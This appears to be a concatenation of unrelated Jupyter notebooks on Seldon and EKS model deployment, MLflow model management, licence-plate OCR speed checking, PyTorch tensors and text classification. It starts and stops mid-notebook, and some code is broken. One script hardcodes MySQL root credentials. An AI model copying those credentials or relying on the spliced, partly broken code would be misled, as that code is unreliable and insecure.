* [Helm](https://github.com/kubernetes/helm)
* [Minikube](https://github.com/kubernetes/minikube)
* [S2I](https://github.com/openshift/source-to-image)
* [H2O](https://www.h2o.ai/download/)
```bash
pip install seldon-core
pip install sklearn
```
## Train locally
```
!mkdir -p experiment
import h2o
h2o.init()
from h2o.estimators.glm import H2OGeneralizedLinearEstimator
path = "http://s3.amazonaws.com/h2o-public-test-data/smalldata/prostate/prostate.csv.zip"
h2o_df = h2o.import_file(path)
h2o_df['CAPSULE'] = h2o_df['CAPSULE'].asfactor()
model = H2OGeneralizedLinearEstimator(family = "binomial")
model.train(y = "CAPSULE",
x = ["AGE", "RACE", "PSA", "GLEASON"],
training_frame = h2o_df)
modelfile = model.download_mojo(path="./experiment/", get_genmodel_jar=False)
print("Model saved to " + modelfile)
!mv experiment/*.zip src/main/resources/model.zip
```
Wrap model using s2i
```
!s2i build . seldonio/seldon-core-s2i-java-build:0.1 h2o-test:0.1 --runtime-image seldonio/seldon-core-s2i-java-runtime:0.1
!docker run --name "h2o_predictor" -d --rm -p 5000:5000 h2o-test:0.1
```
Send some random features that conform to the contract
```
!seldon-core-tester contract.json 0.0.0.0 5000 -p
!docker rm h2o_predictor --force
```
## Test using Minikube
**Due to a [minikube/s2i issue](https://github.com/SeldonIO/seldon-core/issues/253) you will need [s2i >= 1.1.13](https://github.com/openshift/source-to-image/releases/tag/v1.1.13)**
```
!minikube start --memory 4096
```
## Setup Seldon Core
Use the notebook to [Setup Cluster](../../seldon_core_setup.ipynb#Setup-Cluster) with [Ambassador Ingress](../../seldon_core_setup.ipynb#Ambassador) and [Install Seldon Core](../../seldon_core_setup.ipynb#Install-Seldon-Core). Instructions [also online](./seldon_core_setup.html).
## Build model image and run predictions
```
!eval $(minikube docker-env) && s2i build . seldonio/seldon-core-s2i-java-build:0.1 h2o-test:0.1 --runtime-image seldonio/seldon-core-s2i-java-runtime:0.1
!kubectl create -f h2o_deployment.json
```
Wait until ready (replicas == replicasAvailable)
```
!kubectl rollout status deployment/h2o-deployment-h2o-predictor-1cc70ed
!seldon-core-api-tester contract.json `minikube ip` `kubectl get svc ambassador -o jsonpath='{.spec.ports[0].nodePort}'` \
seldon-deployment-example --namespace seldon -p
!minikube delete
```
|
github_jupyter
|
# Model management with MLflow
Model management can be done using both MLflow and the Azure ML SDK/CLI v2. If you are familiar with MLflow and the capabilities it exposes, we support the entire model lifecycle using the MLflow client. If you'd rather use Azure ML-specific features or do model management from the CLI, you can likewise manage the lifecycle using the Azure ML CLI/SDK v2.
## Support matrix for managing models
The MLflow client exposes several methods to retrieve and manage models. The following table shows which of those methods are currently supported in MLflow when connected to Azure ML:
| Feature | MLflow | Azure ML with MLflow | Azure ML CLIv2 |
| :- | :-: | :-: | :-: |
| Registering models in MLModel models | ☑️ | ☑️ | ☑️ |
| Registering models not in MLModel format | ☐ | ☐ | ☑️ |
| Registering models from runs with URIs as `runs:/<run-id>/<path>` | ☑️ | ☑️ | ☐ |
| Registering models from runs with URIs as `azureml://jobs/<job-id>/outputs/artifacts/<path>` | ☐ | ☐ | ☑️* |
| Listing registered models | ☑️ | ☑️ | ☑️ |
| Retrieving details of registered model's versions | ☑️ | ☑️ | ☑️ |
| Editing registered model's versions description | ☑️ | ☑️ | ☑️ |
| Editing registered model's versions tags | ☑️ | ☑️ | ☑️ |
| Renaming registered models | ☑️ | ☐** | ☐** |
| Deleting a registered model (container) | ☑️ | ☐** | ☐** |
| Deleting a registered model's version | ☑️ | ☑️ | ☑️ |
| Search registered models by name | ☑️ | ☑️ | ☑️ |
| Search registered models using string comparators `LIKE` and `ILIKE` | ☑️ | ☐ | ☐ |
| Search registered models by tag | ☐ | ☐ | ☐ |
Notes:
* (*) Has compatibility issues with the MLflow client
* (**) Registered models are immutable objects in Azure ML
## Prerequisites to run this notebook
```
# Ensure you have the dependencies for this notebook
%pip install -r logging_model_with_mlflow.txt
import mlflow
```
In the following notebook, we will explore an example that uses the following naming convention:
```
experiment_name = "heart-classifier"
model_name = "heart-classifier"
artifact_path = "classifier"
```
We need to create a couple of runs and experiments in the workspace to work with. Please run at least one or two training routines:
```
# Install the AML extension and log into Azure
!az extension add -n ml
!az login
# Configure workspace and resource group
!az config set defaults.workspace=MyWorkspace defaults.group=MyResourceGroup
# Ensure there is a compute to train on
!az ml compute create -f ../jobs/trainer-cpu.compute.yml
# Submit a couple of training jobs to have something to work with
!az ml job create -f ../jobs/heart-classifier.job.yml
```
## Before starting
If you are running inside a Compute Instance in Azure ML, MLflow is already configured for use. If you are running on your local machine or on a different platform, please configure MLflow to point to the workspace you want to work with by uncommenting the following line and supplying your workspace tracking URI.
```
# mlflow.set_tracking_uri("<TRACKING_URI>")
```
> To get the URI, please navigate to Azure ML Studio and select the workspace you are working on > Click on the name of the workspace at the upper right corner of the page > Click “View all properties in Azure Portal” on the pane popup > Copy the MLflow tracking URI value from the properties section.
## Creating models from an existing run
If you have an MLflow model logged inside of a run and you want to register it in a registry, you can do so using the experiment and run ID information from the run:
```
exp = mlflow.get_experiment_by_name(experiment_name)
last_run = mlflow.search_runs(exp.experiment_id, output_format="list")[-1]
print(last_run.info.run_id)
```
Once we have identified the run, we can register the model using the MLflow client:
```
mlflow.register_model(f"runs:/{last_run.info.run_id}/{artifact_path}", model_name)
```
## Creating models from assets
If you have a folder containing a model in MLflow's MLmodel format, you can register it directly; the model does not need to be in the context of a run. To do so, use the URI schema `file://path/to/model`. Let's create a simple model and save it in MLmodel format:
```
from sklearn import linear_model
reg = linear_model.LinearRegression()
reg.fit([[0, 0], [1, 1], [2, 2]], [0, 1, 2])
mlflow.sklearn.save_model(reg, "./regressor")
```
Check the files in the folder
```
!ls regressor
```
You can now register the model from the local path:
```
import os
model_local_path = os.path.abspath("./regressor")
mlflow.register_model(f"file://{model_local_path}", "local-model-test")
```
> Notice that the `file://` URI schema requires absolute paths.
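As a sketch of that requirement, `pathlib` can build the absolute `file://` URI from a relative path (illustrative only; `./regressor` is the folder created above):

```python
from pathlib import Path

# Resolve the relative path to an absolute one and render it as a file:// URI
model_uri = Path("./regressor").resolve().as_uri()
print(model_uri)  # e.g. file:///home/user/regressor
```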
## Querying models
### Querying all the models in the registry
You can query all the registered models in the registry using the MLflow client with the method `list_registered_models`.
```
client = mlflow.tracking.MlflowClient()
for model in client.list_registered_models():
print(f"{model.name}")
```
If you are not sure of the name of the model you are looking for, you can search for it:
```
client.search_registered_models(f"name='{model_name}'")
```
### Getting specific versions of the model
The command above retrieves the model objects, including all of their versions. If you want the latest registered version of a given model, you can use `get_registered_model`:
```
client.get_registered_model(model_name)
```
If you need a specific version of the model, you can indicate it:
```
client.get_model_version(model_name, version=2)
```
## Model stages
MLflow supports model stages to manage a model's lifecycle. Stages are assigned to model versions (not to models), which means a given model can have multiple versions in different stages.
### Querying model stages
You can use the MLflow client to check all the possible stages a model version can be in:
```
client.get_model_version_stages(model_name, version="latest")
```
You can see what model version is on each stage by getting the model from the registry:
```
client.get_latest_versions(model_name, stages=["Staging"])
```
Notice that in MLflow multiple versions can be in the same stage at the same time; this method, however, returns the latest version (the greatest version number) among them.
> Caution: Notice that stages are case sensitive.
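As a plain-Python illustration of that behaviour (no MLflow calls; the records are hypothetical), picking the greatest version number within a stage looks like this:

```python
# Hypothetical (version, stage) records for one registered model
versions = [(1, "Staging"), (3, "Staging"), (2, "Production")]

def latest_in_stage(records, stage):
    # Mirrors get_latest_versions: greatest version number within the stage
    candidates = [v for v, s in records if s == stage]
    return max(candidates) if candidates else None

print(latest_in_stage(versions, "Staging"))  # 3
```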
### Transitioning models
To transition a model to a particular stage, you can:
```
client.transition_model_version_stage(model_name, version=3, stage="Staging")
```
By default, any existing model version in that stage remains there; it is not replaced. Alternatively, you can pass `archive_existing_versions=True` to tell MLflow to move the existing versions to the `Archived` stage.
```
client.transition_model_version_stage(
model_name, version=3, stage="Staging", archive_existing_versions=True
)
```
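The archiving behaviour can be modelled in a few lines of plain Python (an illustrative sketch, not the MLflow API; the `{version: stage}` mapping is hypothetical):

```python
def transition(stages, version, stage, archive_existing_versions=False):
    # stages: hypothetical {version: stage} mapping for one model
    updated = dict(stages)
    if archive_existing_versions:
        for v, s in updated.items():
            if s == stage:
                updated[v] = "Archived"
    updated[version] = stage
    return updated

print(transition({1: "Staging", 2: "None"}, 2, "Staging", archive_existing_versions=True))
```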
### Loading models from stages
You can load a model in a particular stage directly from Python using the `load_model` function and the following URI format. Note that for this method to succeed, all the model's libraries and dependencies must already be installed in the environment you are working in.
```
model = mlflow.pyfunc.load_model(f"models:/{model_name}/Staging")
```
## Editing and deleting models
Editing registered models is supported in both MLflow and Azure ML; however, there are some differences between them that are important to note:
### Editing models
You can edit a model's description and tags using MLflow:
> Renaming models is not supported in Azure ML, as model objects are immutable.
```
client.update_model_version(
model_name, version=1, description="A heart condition classifier"
)
```
To edit tags, use the methods `set_model_version_tag` and `delete_model_version_tag`:
```
client.set_model_version_tag(
model_name, version="1", key="type", value="classification"
)
```
Removing a tag:
```
client.delete_model_version_tag(model_name, version="1", key="type")
```
### Deleting a model version
You can delete any model version in the registry using the MLflow client. However, Azure ML doesn't support deleting the entire model container. To achieve the same result, delete all the versions of a given model.
```
client.delete_model_version(model_name, version="2")
```
# AWS Elastic Kubernetes Service (EKS) Deep MNIST
In this example we will deploy a tensorflow MNIST model in Amazon Web Services' Elastic Kubernetes Service (EKS).
This tutorial breaks down into the following sections:
1) Train a tensorflow model to predict mnist locally
2) Containerise the tensorflow model with our docker utility
3) Send some data to the docker model to test it
4) Install and configure AWS tools to interact with AWS
5) Use the AWS tools to create and setup EKS cluster with Seldon
6) Push and run docker image through the AWS Container Registry
7) Test our Elastic Kubernetes deployment by sending some data
#### Let's get started! 🚀🔥
## Dependencies:
* Helm v3.0.0+
* A Kubernetes cluster running v1.13 or above (minikube / docker-for-windows work well if given enough RAM)
* kubectl v1.14+
* EKS CLI v0.1.32
* AWS CLI v1.16.163
* Python 3.6+
* Python DEV requirements
## 1) Train a tensorflow model to predict mnist locally
We will load the MNIST images, together with their labels, and then train a TensorFlow model to predict the right labels.
```
from tensorflow.examples.tutorials.mnist import input_data
mnist = input_data.read_data_sets("MNIST_data/", one_hot = True)
import tensorflow as tf
if __name__ == '__main__':
x = tf.placeholder(tf.float32, [None,784], name="x")
W = tf.Variable(tf.zeros([784,10]))
b = tf.Variable(tf.zeros([10]))
y = tf.nn.softmax(tf.matmul(x,W) + b, name="y")
y_ = tf.placeholder(tf.float32, [None, 10])
cross_entropy = tf.reduce_mean(-tf.reduce_sum(y_ * tf.log(y), reduction_indices=[1]))
train_step = tf.train.GradientDescentOptimizer(0.5).minimize(cross_entropy)
init = tf.initialize_all_variables()
sess = tf.Session()
sess.run(init)
for i in range(1000):
batch_xs, batch_ys = mnist.train.next_batch(100)
sess.run(train_step, feed_dict={x: batch_xs, y_: batch_ys})
correct_prediction = tf.equal(tf.argmax(y,1), tf.argmax(y_,1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
print(sess.run(accuracy, feed_dict = {x: mnist.test.images, y_:mnist.test.labels}))
saver = tf.train.Saver()
saver.save(sess, "model/deep_mnist_model")
```
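The softmax and cross-entropy used in the graph above can be sketched in NumPy (illustrative only, not part of the training script):

```python
import numpy as np

def softmax(z):
    # Subtract the row max for numerical stability before exponentiating
    e = np.exp(z - z.max(axis=1, keepdims=True))
    return e / e.sum(axis=1, keepdims=True)

def cross_entropy(y_true, y_prob):
    # Mean over the batch of -sum(y * log(p)), matching the TF expression above
    return float(np.mean(-np.sum(y_true * np.log(y_prob), axis=1)))

z = np.array([[2.0, 1.0, 0.1]])
p = softmax(z)
y = np.array([[1.0, 0.0, 0.0]])
print(p, cross_entropy(y, p))
```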
## 2) Containerise the tensorflow model with our docker utility
First you need to make sure that you have added the .s2i/environment configuration file in this folder with the following content:
```
!cat .s2i/environment
```
Now we can build a docker image named "deep-mnist" with the tag 0.1
```
!s2i build . seldonio/seldon-core-s2i-python36:1.3.0-dev deep-mnist:0.1
```
## 3) Send some data to the docker model to test it
We first run the docker image we just created as a container called "mnist_predictor"
```
!docker run --name "mnist_predictor" -d --rm -p 5000:5000 deep-mnist:0.1
```
Send some random features that conform to the contract
```
import matplotlib.pyplot as plt
import numpy as np
import math
from seldon_core.seldon_client import SeldonClient
# This is the variable that was initialised at the beginning of the file
i = [0]
x = mnist.test.images[i]
y = mnist.test.labels[i]
plt.imshow(x.reshape((28, 28)), cmap='gray')
plt.show()
print("Expected label: ", np.sum(range(0,10) * y), ". One hot encoding: ", y)
# We now test the REST endpoint expecting the same result
endpoint = "0.0.0.0:5000"
batch = x
payload_type = "ndarray"
sc = SeldonClient(microservice_endpoint=endpoint)
# We use the microservice, instead of the "predict" function
client_prediction = sc.microservice(
data=batch,
method="predict",
payload_type=payload_type,
names=["tfidf"])
for proba, label in zip(client_prediction.response.data.ndarray.values[0].list_value.ListFields()[0][1], range(0,10)):
print(f"LABEL {label}:\t {proba.number_value*100:6.4f} %")
!docker rm mnist_predictor --force
```
## 4) Install and configure AWS tools to interact with AWS
First we install the awscli
```
!pip install awscli --upgrade --user
```
#### Configure aws so it can talk to your server
(if you are getting issues, make sure you have the permissions to create clusters)
```
%%bash
# You must make sure that the access key and secret are changed
aws configure << END_OF_INPUTS
YOUR_ACCESS_KEY
YOUR_ACCESS_SECRET
us-west-2
json
END_OF_INPUTS
```
#### Install eksctl
*IMPORTANT*: These instructions are for linux
Please follow the official installation of eksctl at: https://docs.aws.amazon.com/eks/latest/userguide/getting-started-eksctl.html
```
!curl --silent --location "https://github.com/weaveworks/eksctl/releases/download/latest_release/eksctl_$(uname -s)_amd64.tar.gz" | tar xz
!chmod 755 ./eksctl
!./eksctl version
```
## 5) Use the AWS tools to create and setup EKS cluster with Seldon
In this example we will create a cluster with 2 nodes, with a minimum of 1 and a max of 3. You can tweak this accordingly.
If you want to check the status of the deployment you can go to AWS CloudFormation or to the EKS dashboard.
It will take 10-15 minutes (so feel free to go grab a ☕).
### IMPORTANT: If you get errors in this step...
It is most probably IAM role access requirements, which requires you to discuss with your administrator.
```
%%bash
./eksctl create cluster \
--name demo-eks-cluster \
--region us-west-2 \
--nodes 2 \
--nodes-min 1 \
--nodes-max 3
```
### Configure local kubectl
We want to now configure our local Kubectl so we can actually reach the cluster we've just created
```
!aws eks --region us-west-2 update-kubeconfig --name demo-eks-cluster
```
And we can check if the context has been added to kubectl config (contexts are basically the different k8s cluster connections)
You should be able to see the context as "...aws:eks:us-west-2:...".
If it's not activated you can switch to that context with `kubectl config use-context <CONTEXT_NAME>`
```
!kubectl config get-contexts
```
## Setup Seldon Core
Use the setup notebook to [Setup Cluster](../../seldon_core_setup.ipynb#Setup-Cluster) with [Ambassador Ingress](../../seldon_core_setup.ipynb#Ambassador) and [Install Seldon Core](../../seldon_core_setup.ipynb#Install-Seldon-Core). Instructions [also online](./seldon_core_setup.html).
## Push docker image
In order for the EKS seldon deployment to access the image we just built, we need to push it to the Elastic Container Registry (ECR).
If you have any issues please follow the official AWS documentation: https://docs.aws.amazon.com/AmazonECR/latest/userguide/docker-basics.html
### First we create a registry
You can run the following command, and then see the result at https://us-west-2.console.aws.amazon.com/ecr/repositories?#
```
!aws ecr create-repository --repository-name seldon-repository --region us-west-2
```
### Now prepare docker image
We need to first tag the docker image before we can push it
```
%%bash
export AWS_ACCOUNT_ID=""
export AWS_REGION="us-west-2"
if [ -z "$AWS_ACCOUNT_ID" ]; then
echo "ERROR: Please provide a value for the AWS variables"
exit 1
fi
docker tag deep-mnist:0.1 "$AWS_ACCOUNT_ID.dkr.ecr.$AWS_REGION.amazonaws.com/seldon-repository"
```
### We now login to aws through docker so we can access the repository
```
!`aws ecr get-login --no-include-email --region us-west-2`
```
### And push the image
Make sure you add your AWS Account ID
```
%%bash
export AWS_ACCOUNT_ID=""
export AWS_REGION="us-west-2"
if [ -z "$AWS_ACCOUNT_ID" ]; then
echo "ERROR: Please provide a value for the AWS variables"
exit 1
fi
docker push "$AWS_ACCOUNT_ID.dkr.ecr.$AWS_REGION.amazonaws.com/seldon-repository"
```
## Running the Model
We will now run the model.
Let's first have a look at the file we'll be using to trigger the model:
```
!cat deep_mnist.json
```
Now let's trigger seldon to run the model.
We have a JSON deployment file in which we replace the value "REPLACE_FOR_IMAGE_AND_TAG" with the image you pushed
```
%%bash
export AWS_ACCOUNT_ID=""
export AWS_REGION="us-west-2"
if [ -z "$AWS_ACCOUNT_ID" ]; then
echo "ERROR: Please provide a value for the AWS variables"
exit 1
fi
sed 's|REPLACE_FOR_IMAGE_AND_TAG|'"$AWS_ACCOUNT_ID"'.dkr.ecr.'"$AWS_REGION"'.amazonaws.com/seldon-repository|g' deep_mnist.json | kubectl apply -f -
```
And let's check that it's been created.
You should see an image called "deep-mnist-single-model...".
We'll wait until STATUS changes from "ContainerCreating" to "Running"
```
!kubectl get pods
```
## Test the model
Now we can test the model. Let's first find out the URL we'll have to use:
```
!kubectl get svc ambassador -o jsonpath='{.status.loadBalancer.ingress[0].hostname}'
```
We'll use a random example from our dataset
```
import matplotlib.pyplot as plt
# This is the variable that was initialised at the beginning of the file
i = [0]
x = mnist.test.images[i]
y = mnist.test.labels[i]
plt.imshow(x.reshape((28, 28)), cmap='gray')
plt.show()
print("Expected label: ", np.sum(range(0,10) * y), ". One hot encoding: ", y)
```
We can now add the URL above to send our request:
```
from seldon_core.seldon_client import SeldonClient
import math
import numpy as np
host = "a68bbac487ca611e988060247f81f4c1-707754258.us-west-2.elb.amazonaws.com"
port = "80" # Make sure you use the port above
batch = x
payload_type = "ndarray"
sc = SeldonClient(
gateway="ambassador",
ambassador_endpoint=host + ":" + port,
namespace="default",
oauth_key="oauth-key",
oauth_secret="oauth-secret")
client_prediction = sc.predict(
data=batch,
deployment_name="deep-mnist",
names=["text"],
payload_type=payload_type)
print(client_prediction)
```
### Let's visualise the probability for each label
It seems that it correctly predicted the number 7
```
for proba, label in zip(client_prediction.response.data.ndarray.values[0].list_value.ListFields()[0][1], range(0,10)):
print(f"LABEL {label}:\t {proba.number_value*100:6.4f} %")
```
```
# Importing libraries
import cv2
from matplotlib import pyplot as plt
import numpy as np
import imutils
import easyocr
from datetime import datetime
import mysql.connector
from csv import writer
# Importing the image and converting it to grayscale
img = cv2.imread('image3.jpg')
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
plt.imshow(gray)
# Detecting edges
bfilter = cv2.bilateralFilter(gray, 11, 17, 17) #Noise reduction
edged = cv2.Canny(bfilter, 30, 200) #Edge detection
plt.imshow(edged)
#Finding Contours
keypoints = cv2.findContours(edged.copy(), cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
contours = imutils.grab_contours(keypoints)
contours = sorted(contours, key=cv2.contourArea, reverse=True)[:10]
location = None
for contour in contours:
approx = cv2.approxPolyDP(contour, 10, True)
if len(approx) == 4:
location = approx
break
location
#Finding the location
mask = np.zeros(gray.shape, np.uint8)
new_image = cv2.drawContours(mask, [location], 0,255, -1)
new_image = cv2.bitwise_and(img, img, mask=mask)
plt.imshow(cv2.cvtColor(new_image, cv2.COLOR_BGR2RGB))
# Cropping the plate region from the grayscale image
(x,y) = np.where(mask==255)
(x1, y1) = (np.min(x), np.min(y))
(x2, y2) = (np.max(x), np.max(y))
cropped_image = gray[x1:x2+1, y1:y2+1]
plt.imshow(cropped_image, cmap='gray')  # cropped_image is single-channel, so no BGR2RGB conversion
#Using OCR
reader = easyocr.Reader(['en'])
result = reader.readtext(cropped_image)
result
#Results
text2=""
if len(result)>1:
text = result[0][-2]+" "+result[1][-2]
else:
text = result[0][-2]
for i in text:
if i=="," or i=="." or i.isspace():
i=""
text2+=i
text2 = text2.upper()
print(text2)
#Searching in database
db2 = mysql.connector.connect(host="localhost",user="root",passwd="root",database="iip")
mycursor2 = db2.cursor()
mycursor2.execute("SELECT numberplate, time FROM vehicle WHERE numberplate = %s",(text2,))
myresult = mycursor2.fetchall()
row_count = mycursor2.rowcount
print ("number of affected rows: {}".format(row_count))
if row_count == 0:
print ("It Does Not Exist")
else:
tme=myresult[0][1]
date_from_sql = tme.strftime('%H:%M:%S')
date_from_sql = datetime.strptime(date_from_sql, '%H:%M:%S')
now = datetime.now()
formatted_date = now.strftime('%H:%M:%S')
formatted_date = datetime.strptime(formatted_date, '%H:%M:%S')
delta = formatted_date - date_from_sql
diff=delta.seconds
print(diff)
#Adding to CSV file
max_speed = 30 #in Km/h
distance = 1 #in Km
avg_spd = distance/(diff/3600)
print(avg_spd)
if(max_speed < avg_spd):
print("The average speed of car is higher than max speed")
ls = [myresult[0][0], avg_spd]
with open('car.csv', 'a') as f_object:
writer_object = writer(f_object)
writer_object.writerow(ls)
f_object.close()
```
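The character-cleaning loop above (dropping commas, periods and whitespace, then upper-casing) can be written more compactly with a regular expression; `normalize_plate` is a hypothetical helper name, and the sample plate string is made up for illustration:

```python
import re

def normalize_plate(text):
    # Remove commas, periods and whitespace, then uppercase
    return re.sub(r"[,.\s]", "", text).upper()

print(normalize_plate("mh 12, de.1433"))  # MH12DE1433
```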
# Matrices, Arrays, Tensors
## References
- Official PyTorch tensor documentation:
http://pytorch.org/docs/master/tensors.html
- PyTorch for NumPy users:
https://github.com/torch/torch7/wiki/Torch-for-Numpy-users
## NumPy array
```
import numpy as np
a = np.array([[2., 8., 3.],
[0.,-1., 5.]])
a
a.shape
a.dtype
```
## PyTorch tensor
The default `torch.Tensor` type is 32-bit floating point; tensors also support other dtypes, such as float64 (double) and integer types.
```
import torch
```
### Converting a NumPy array to a PyTorch tensor
```
b = torch.Tensor(np.zeros((3,4)))
b
```
### Creating constant arrays and tensors
```
c = np.ones((2,4)); c
d = torch.ones((2,4)); d
```
### Creating random arrays and tensors
```
e = np.random.rand(2,4); e
f = torch.rand(2,4); f
```
### Seeded random arrays, to reproduce the same pseudorandom sequence
```
np.random.seed(1234)
e = np.random.rand(2,4);e
torch.manual_seed(1234)
f = torch.rand(2,4); f
```
### Torch seed is different for GPU
```
if torch.cuda.is_available():
    torch.cuda.manual_seed(1234)
    g = torch.rand(2, 4, device='cuda')
print(g)
```
## Conversions between NumPy and PyTorch tensors
### NumPy to PyTorch tensor using `.from_numpy()` - CAUTION
Not every NumPy element type can be converted to a PyTorch tensor. Below is a program
that builds an equivalence table between NumPy dtypes and PyTorch tensor types:
```
import pandas as pd
dtypes = [np.uint8, np.int32, np.int64, np.float32, np.float64, np.double]
table = np.empty((2, len(dtypes)), dtype=object)
for i,t in enumerate(dtypes):
a = np.array([1],dtype=t)
ta = torch.from_numpy(a)
table[0,i] = a.dtype.name
table[1,i] = type(ta).__name__
pd.DataFrame(table)
```
### NumPy to tensor using `torch.FloatTensor()` - recommended method
There is an important caveat when converting NumPy matrices to PyTorch tensors: PyTorch's neural-network functions use the FloatTensor type, while NumPy defaults to float64. The automatic conversion therefore produces a PyTorch DoubleTensor and consequently raises an error.
The recommendation is to use `torch.FloatTensor` to convert NumPy arrays to PyTorch tensors:
```
a = np.ones((2,5))
a_t = torch.FloatTensor(a)
a_t
```
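The dtype mismatch described above can be seen with NumPy alone (a sketch that does not require PyTorch): NumPy defaults to float64, which is why the explicit float32 conversion matters.

```python
import numpy as np

a = np.ones((2, 5))
print(a.dtype)            # float64 by default
b = a.astype(np.float32)  # the dtype torch.FloatTensor effectively produces
print(b.dtype)
```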
### PyTorch tensor to NumPy array
```
ta = torch.ones(2,3)
ta
a = ta.numpy()
a
```
## Tensors on the CPU and the GPU
```
ta_cpu = torch.ones(2,3); ta_cpu
if torch.cuda.is_available():
ta_gpu = ta_cpu.cuda()
print(ta_gpu)
```
## Operations on tensors
### Creating a tensor and inspecting its shape
```
a = torch.eye(4); a
a.size()
```
### Reshape is done with `view` in PyTorch
```
b = a.view(2,8); b
```
Here is an example that creates a sequential one-dimensional tensor from 0 to 23 and then reshapes it
so the tensor has 4 rows and 6 columns
```
a = torch.arange(0,24).view(4,6);a
```
### Element-wise addition
#### using operators
```
c = a + a; c
d = a - c ; d
```
#### functional form
```
d = a.sub(c); d
```
#### In-place operation
```
a.sub_(c); a
```
### Element-wise multiplication
```
d = a * c; d
d = a.mul(c); d
a.mul_(c); a
```
### Mean of tensors
```
a = torch.arange(0,24).view(4,6); a
u = a.mean(); u
uu = a.sum()/a.nelement(); uu
```
### Mean with axis reduction
```
u_row = a.mean(dim=1); u_row
u_col = a.mean(dim=0); u_col
```
### Standard deviation
```
std = a.std(); std
std_row = a.std(dim=1); std_row
```
## CPU vs GPU speedup comparison
```
a_numpy_cpu = np.ones((1000,1000))
%timeit b = 2 * a_numpy_cpu
a_torch_cpu = torch.ones(1000,1000)
%timeit b = 2 * a_torch_cpu
if torch.cuda.is_available():
a_torch_gpu = a_torch_cpu.cuda()
%timeit b = 2 * a_torch_gpu
```
Running this code on a GTX 1080: speedup of 15.5
- 888 µs ± 43.4 ns per loop (mean ± std. dev. of 7 runs, 1000 loops each)
- 57.1 µs ± 22.7 ns per loop (mean ± std. dev. of 7 runs, 10000 loops each)
Running on a MacBook:
- numpy: 1000 loops, best of 3: 449 µs per loop
- torch: 1000 loops, best of 3: 1.6 ms per loop
```
%timeit b1 = a_numpy_cpu.mean()
%timeit b2 = a_torch_cpu.mean()
if torch.cuda.is_available():
%timeit c = a_torch_gpu.mean()
```
```
import sys
sys.path.append('../transformers/')
import tensorflow as tf
import tensorflow_datasets as tfds
import numpy as np
import matplotlib.pyplot as plt
import matplotlib as mpl
import pickle
from tqdm import tqdm
from path_explain import utils
from plot.text import text_plot, matrix_interaction_plot, bar_interaction_plot
from model import cnn_model
from embedding_explainer import EmbeddingExplainerTF
utils.set_up_environment(visible_devices='3')
encoder = tfds.features.text.TokenTextEncoder.load_from_file('encoder')
model = tf.keras.models.load_model('model.h5')
interpret_model = cnn_model(encoder.vocab_size, for_interpretation=True)
interpret_model.load_weights('model.h5', by_name=True)
sentences = [
'This movie was bad',
'This movie was not bad',
'A movie',
'A bad movie',
'A bad, terrible movie',
'A bad, terrible, awful movie',
'A bad, terrible, awful, horrible movie'
]
ids_list = []
for sentence in sentences:
ids = encoder.encode(sentence)
ids = np.array(ids)
ids = np.pad(ids, pad_width=(0, max(0, 52 - len(ids))))
ids_list.append(ids)
ids_list = np.stack(ids_list, axis=0)
model(ids_list)
embedding_model = tf.keras.models.Model(model.input, model.layers[1].output)
embeddings = embedding_model(ids_list)
baseline_embedding = embedding_model(np.zeros((1, 52), dtype=np.float32))
explainer = EmbeddingExplainerTF(interpret_model)
attributions = explainer.attributions(inputs=embeddings,
baseline=baseline_embedding,
batch_size=128,
num_samples=256,
use_expectation=False,
output_indices=0,
verbose=True)
interactions = explainer.interactions(inputs=embeddings,
baseline=baseline_embedding,
batch_size=128,
num_samples=256,
use_expectation=False,
output_indices=0,
verbose=True)
i = 1
encoder.decode(ids_list[i]).split(' ')
text_plot('this movie was not bad'.split(' '), attributions[i], include_legend=True)
plt.savefig('movie_not_bad_cnn_text.pdf')
i = 1
matrix_interaction_plot(interactions[i, ids_list[i] != 0][:, :5], encoder.decode(ids_list[i]).split(' '))
plt.savefig('not_bad_cnn_matrix.pdf')
# `plot_all` is a helper defined elsewhere in the original notebook
plot_all(0)
plot_all(1)
plot_all(2)
plot_all(3)
plot_all(4)
plot_all(5)
plot_all(6)
```
```
# import packages
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
import re
import nltk
from nltk.corpus import stopwords
from nltk.stem.porter import PorterStemmer
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.model_selection import train_test_split
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import accuracy_score, precision_score, recall_score, confusion_matrix, f1_score
from imblearn.over_sampling import SMOTE
import warnings
warnings.filterwarnings("ignore")
```
### Load the dataset
- Load the train data and using all your knowledge try to explore the different statistical properties of the dataset.
```
# Code starts here
# load data
df = pd.read_csv("train.csv")
# Converting date attribute from string to datetime.date datatype
df['date'] = pd.to_datetime(df['date'])
# calculate the length of each review
df['length'] = df['verified_reviews'].apply(len)
df.head()
# Code ends here
```
### Visualize and Preprocess the data
- Visualize the different features of your interest
- Retaining only alphabets (Using regular expressions)
- Removing stopwords (Using nltk library)
```
## Rating vs feedback
# set figure size
plt.figure(figsize=(15,7))
# generate countplot
sns.countplot(x="rating", hue="feedback", data=df)
# display plot
plt.show()
## Product rating vs feedback
# set figure size
plt.figure(figsize=(15,7))
# generate barplot
sns.barplot(x="rating", y="variation", hue="feedback", data=df, ci = None)
# display plot
plt.show()
# import packages
import re
import nltk
from nltk.corpus import stopwords
from nltk.stem.porter import PorterStemmer
# declare empty list 'corpus'
corpus=[]
# for loop to fill in corpus
for i in range(0,2520):
# retain alphabets
review = re.sub('[^a-zA-Z]', ' ', df['verified_reviews'][i] )
# convert to lower case
review=review.lower()
# tokenize
review=review.split()
# initialize stemmer object
ps=PorterStemmer()
# perform stemming
review=[ps.stem(word) for word in review if not word in set(stopwords.words('english'))]
# join elements of list
review=' '.join(review)
# add to 'corpus'
corpus.append(review)
```
### Model building
- Now let's come to the actual task: using any classifier, predict the `feedback`. Use the different techniques you have learned to improve the performance of the model.
- Try improving upon the `accuracy_score` and the [precision score](https://scikit-learn.org/stable/modules/generated/sklearn.metrics.precision_score.html)
```
# import libraries
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.model_selection import train_test_split
# Instantiate count vectorizer
cv = CountVectorizer(max_features=1500)
# Independent variable
X = cv.fit_transform(corpus).toarray()
# dependent variable
y = df['feedback']
# Counts
count = y.value_counts()
print(count)
# Split the dataset
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.20, random_state = 0)
# import packages
from sklearn.ensemble import RandomForestClassifier
